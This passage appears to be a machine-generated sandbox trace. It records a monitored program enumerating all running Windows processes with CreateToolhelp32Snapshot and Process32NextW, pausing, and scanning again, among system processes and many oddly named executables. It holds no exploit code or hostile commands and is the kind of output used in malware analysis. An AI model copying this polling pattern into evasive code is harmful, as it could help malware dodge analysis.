hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0147.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.066] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.068] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.070] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0147.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0147.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0147.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0147.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0147.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0147.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0147.108] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0147.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0147.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0147.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0147.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0147.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0147.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0147.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0147.117] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0147.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0147.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0147.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0147.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0147.122] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0147.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0147.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0147.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0147.127] CloseHandle (hObject=0xbc) returned 1 [0147.127] Sleep (dwMilliseconds=0x12c) [0147.480] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0147.486] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.487] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0147.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0147.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.505] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.507] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0147.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0147.509] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0147.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0147.512] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0147.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0147.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0147.515] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0147.516] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0147.517] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 